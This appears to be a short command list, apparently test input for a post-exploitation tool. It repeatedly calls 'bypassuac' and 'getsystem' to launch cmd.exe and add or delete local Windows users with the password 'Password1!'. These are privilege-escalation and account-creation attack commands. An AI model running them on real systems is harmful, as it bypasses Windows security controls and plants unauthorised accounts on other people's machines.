bypassuac 1 "C:\windows\system32\cmd.exe"
bypassuac 1 "net user test Password1! /add"
bypassuac 1 "net user test /delete"
bypassuac 1 "net user test Password1! /add"
bypassuac 1 "net user test /delete"
bypassuac 1 "net user test Password1! /add"
bypassuac 1 "net user test /delete"
bypassuac 1 "net user test Password1! /add"
bypassuac 1 "net user test /delete"
bypassuac 1 "net user test Password1! /add"
bypassuac 1 "net user test /delete"
bypassuac 1 "net user test Password1! /add"
bypassuac 1 "net user test /delete"
bypassuac 1 "net user test Password1! /add"
bypassuac 1 "net user test /delete"
bypassuac 1 "net user test Password1! /add"
bypassuac 1 "net user test /delete"
bypassuac 1 "net user test Password1! /add"
bypassuac 1 "net user test /delete"
getsystem 1 "C:\windows\system32\cmd.exe"
getsystem 1 "net user test2 Password1! /add"